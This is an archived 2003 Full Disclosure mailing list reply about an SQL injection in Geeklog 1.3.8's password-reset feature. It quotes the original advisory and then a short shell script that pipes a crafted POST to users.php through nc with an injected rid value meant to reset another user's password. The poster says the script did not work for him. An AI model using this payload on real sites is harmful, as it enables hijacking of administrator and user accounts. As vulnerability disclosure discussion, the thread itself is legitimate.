Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

fulldisclosure logo Full Disclosure mailing list archives

Re: Geeklog exploit
From: Thomas Rogg <thomas () outcast-media com>
Date: Sun, 19 Oct 2003 20:15:15 +0200
am 19.10.2003 18:21 Uhr schrieb Jouko Pynnonen unter jouko () iki fi:



...
The exploit uses the "forgot password" feature introduced in Geeklog
1.3.8. By constructing a certain kind of HTTP request, an attacker can
change any user's Geeklog password, including the administrator
password. This is because an SQL injection problem. In users.php we have
this kind of code (line about 750):
...


I tried out your exploit on a v1.3.8 Geeklog of mine, but the returned HTML
says: "Your request for a new password has expired. Please try again below."

Am I missing something? All I changed was to use HTTP/1.1 and to use
parameters for host and path:

-----
#!/bin/sh

echo "POST $2users.php HTTP/1.1
Host: $1
Connection: close
Content-length: 50
Content-type: application/x-www-form-urlencoded

mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&
" | nc $1 80
-----

Thank you,

Thomas

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

  By Date           By Thread  

Current thread:
  • Geeklog exploit Jouko Pynnonen (Oct 19)
    • Re: Geeklog exploit Thomas Rogg (Oct 19)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]